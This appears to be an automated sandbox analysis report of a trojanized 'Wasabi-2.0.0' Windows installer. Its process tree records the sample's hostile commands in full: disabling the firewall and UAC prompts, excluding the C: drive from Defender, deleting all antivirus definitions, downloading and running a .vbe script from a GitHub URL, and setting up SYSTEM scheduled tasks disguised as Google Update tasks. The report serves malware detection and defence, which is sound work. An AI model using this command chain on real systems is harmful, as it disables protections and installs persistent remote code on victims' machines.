Analysis
-
max time kernel
66s
-
max time network
33s
-
platform
windows7_x64
-
resource
win7-20221111-en
-
resource tags
arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
-
submitted
11-01-2023 11:33
Static task
static1
Behavioral task
behavioral1
Sample
Wasabi-2.0.0-windows-x64.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Wasabi-2.0.0-windows-x64.exe
Resource
win10v2004-20220901-en
General
-
Target
Wasabi-2.0.0-windows-x64.exe
-
Size
80.2MB
-
MD5
d891a0dd3031ba640ad4ac38e637193d
-
SHA1
aa8d36b8b0df86458c4c2c584209938bfd2a21ff
-
SHA256
cabfd8d8f97582b86787a83a1dee4446d0f2e3ba4f346884c5cd6e242b61df78
-
SHA512
cd4e2db41df7a843a5bc1fa8cb0ac9778ffe315311aa19a84c1e36e122af38ff6e61d3bbe26582f508c1ecfc36b5df2a2f988ed1450d4e7c10499c319c130a6d
-
SSDEEP
1572864:fm9oNpXGKGC5kSQUwOy5NpYpnFzGl4vBzDKBbRUfJUNQxup00Hc1q8ACfH85Ckwq:e6ZG+Qoy5NoFilK9KJRxNQgv81/Apnwq
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
- pid 1132, process MpCmdRun.exe
-
Processes:
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" (process: WScript.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications (process: WScript.exe)
-
Processes:
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" (process: powershell.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" (process: powershell.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" (process: powershell.exe)
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Processes:
- Key created: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration (process: WScript.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\Notification_Suppress = "1" (process: WScript.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\UILockdown = "0" (process: WScript.exe)
-
Drops file in Windows directory 2 IoCs
Processes:
- File opened for modification: C:\Windows\Logs\DISM\dism.log (process: Dism.exe)
- File opened for modification: C:\Windows\Logs\DISM\dism.log (process: Dism.exe)
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- pid 2560, process schtasks.exe
- pid 2592, process schtasks.exe
-
Processes:
- Key created: \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main (process: Wasabi-2.0.0-windows-x64.exe)
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
- pid 1352, process powershell.exe
- pid 1616, process powershell.exe
- pid 820, process powershell.exe
- pid 2008, process powershell.exe
- pid 1420, process powershell.exe
- pid 1860, process powershell.exe
- pid 1744, process powershell.exe
- pid 1560, process powershell.exe
- pid 1548, process powershell.exe
- pid 760, process powershell.exe
- pid 2408, process powershell.exe
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
- Token: SeDebugPrivilege, pid 2008, process powershell.exe
- Token: SeDebugPrivilege, pid 1352, process powershell.exe
- Token: SeDebugPrivilege, pid 820, process powershell.exe
- Token: SeDebugPrivilege, pid 1616, process powershell.exe
- Token: SeDebugPrivilege, pid 1420, process powershell.exe
- Token: SeDebugPrivilege, pid 1744, process powershell.exe
- Token: SeDebugPrivilege, pid 760, process powershell.exe
- Token: SeDebugPrivilege, pid 1560, process powershell.exe
- Token: SeDebugPrivilege, pid 1548, process powershell.exe
- Token: SeDebugPrivilege, pid 1860, process powershell.exe
- Token: SeDebugPrivilege, pid 2408, process powershell.exe
- Token: 33, pid 2632, process AUDIODG.EXE
- Token: SeIncBasePriorityPrivilege, pid 2632, process AUDIODG.EXE
- Token: 33, pid 2632, process AUDIODG.EXE
- Token: SeIncBasePriorityPrivilege, pid 2632, process AUDIODG.EXE
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
- pid 2024, process Wasabi-2.0.0-windows-x64.exe
- pid 2024, process Wasabi-2.0.0-windows-x64.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
Image: C:\Users\Admin\AppData\Local\Temp\Wasabi-2.0.0-windows-x64.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Wasabi-2.0.0-windows-x64.exe"
Tree depth: 1
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2024
-
Image: C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe"
Tree depth: 2
- Suspicious use of WriteProcessMemory
PID:1384
-
Image: C:\Windows\SysWOW64\WScript.exe
Command line: "C:\Windows\SysWOW64\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe" /elevate
Tree depth: 3
- Modifies Windows Defender notification settings
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:920
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Force; Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Force;
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False;
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
Tree depth: 4
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorUser -Value 0
Tree depth: 4
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA ​​-Value 1
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:820
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name PromptOnSecureDesktop -Value 0
Tree depth: 4
- UAC bypass
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C: -Force;
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionProcess *.exe, *.bat, *.vbs, *.vbe -Force;
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-Location 'C:\Program Files\Windows Defender'; .\mpcmdrun.exe -RemoveDefinitions -All;
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352
-
Image: C:\Program Files\Windows Defender\MpCmdRun.exe
Command line: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Tree depth: 5
- Deletes Windows Defender Definitions
PID:1132
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Install-WindowsFeature NET-Framework-Core; DISM /Online /Enable-Feature /FeatureName:"NetFx3"; DISM /Online /Enable-Feature /FeatureName:NetFx3 /All; Enable-WindowsOptionalFeature -Online -FeatureName "NetFx3";
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616
-
Image: C:\Windows\SysWOW64\Dism.exe
Command line: "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3
Tree depth: 5
- Drops file in Windows directory
PID:2100
-
Image: C:\Windows\SysWOW64\Dism.exe
Command line: "C:\Windows\system32\Dism.exe" /Online /Enable-Feature /FeatureName:NetFx3 /All
Tree depth: 5
- Drops file in Windows directory
PID:2220
-
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Net.ServicePointManager]::SecurityProtocol = 'tls12, tls11, tls'; iwr https://github.com/BejaminGofer81/p/raw/main/post.vbe -OutFile C:\ProgramData\post.vbe; start C:\ProgramData\post.vbe;
Tree depth: 4
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
Image: C:\Windows\SysWOW64\cmd.exe
Command line: cmd /c ""C:\ProgramData\Microsoft\Google\src.bat" "
Tree depth: 4
PID:2500
-
Image: C:\Windows\SysWOW64\schtasks.exe
Command line: SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003Core" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC DAILY /ST 20:30 /F /RL HIGHEST
Tree depth: 5
- Creates scheduled task(s)
PID:2560
-
Image: C:\Windows\SysWOW64\schtasks.exe
Command line: SCHTASKS /Create /TN "GoogleUpdateTaskUserS-1-5-21-1957224488-855655398-725946643-1003UA" /RU "NT AUTHORITY\SYSTEM" /TR "C:\ProgramData\Microsoft\Google\Update\1.3.36.152\update.bat" /SC ONSTART /F /RL HIGHEST
Tree depth: 5
- Creates scheduled task(s)
PID:2592
-
Image: C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c netsh advfirewall set currentprofile state off
Tree depth: 4
PID:2524
-
Image: C:\Windows\SysWOW64\netsh.exe
Command line: netsh advfirewall set currentprofile state off
Tree depth: 5
- Modifies Windows Firewall
PID:2576
-
Image: C:\Windows\explorer.exe
Command line: "C:\Windows\explorer.exe"
Tree depth: 1
PID:2284
-
Image: C:\Windows\system32\AUDIODG.EXE
Command line: C:\Windows\system32\AUDIODG.EXE 0x470
Tree depth: 1
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
Image: C:\Windows\system32\wermgr.exe
Command line: "C:\Windows\system32\wermgr.exe" "-outproc" "1264" "3272"
Tree depth: 1
PID:2724
Network
MITRE ATT&CK Enterprise v6
Downloads
-
C:\ProgramData\Microsoft\Google\src.bat
Filesize
775B
MD5
1a7f60c6657bb003216db72b4f550a26
SHA1
0fed1e332b2570a3ceed6d3d7482f31a91d95f0e
SHA256
9798ff8cd05e753d3dd68f78a2541ab6d5f62a6a2442e7c40218cfb4313fcd06
SHA512
2e1b529820262919784394861ac4df552a083336920432e3c5fff5b0b08cce1a105532c58cc4a392649e2482772bcf57cd0c6ceb69b7137293934ca7ae9e3a12
-
C:\Users\Admin\AppData\Local\Temp\configuration\config.vbe
Filesize
9KB
MD5
3cf9755443bb956bc8dbec8589692a53
SHA1
2b9551af484fbf7efea22ed41e264e2e03d253ff
SHA256
38399c8324cfc525569a77fa8152bc1aa74084213cfa9e38e205c9f96a13e67c
SHA512
cf156564be1e556b671f0b9f0bafb019c7b9450d8587636a3b3da3823b893c6c49b5a16310ee804fb201476ec7c3630ed22f7c89812cf2fecd792d5c7ba408d4
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB
MD5
44d1b617d5a7478552aaf51b82d61b8c
SHA1
c2878f36169516910bbf355fd245fd749c8a3f4c
SHA256
cf1c554a2ea27fc65ebd44405844bc43441fa4913a900fab66a3dbdec76be283
SHA512
5a13149fd6154e6c27bed14a6549ec05d425bf4b5cbb9df54641ccb7a9de0f89253092ae813160d9c183f0d5e5635b38e1f8b965deae7c5b87d161b0f2ba9b99
-
C:\Windows\Logs\DISM\dism.log
Filesize
149KB
MD5
4eccb4207400a5427d99b3721a472b53
SHA1
286589ac2c03bdbef51ba3b692870a059d62f97d
SHA256
4811439283c253a5941ca84c11863b7f4a2a5f18dcb444ce3bc94228e5a83b73
SHA512
2f6b07d7728b1f3022d7a9ecb8baec9961af919e1cdf8db2f937fcb6a60e27f4bc975e1e883a72b7f37479c6198b42a81b7045512d425cf294077221da612bb7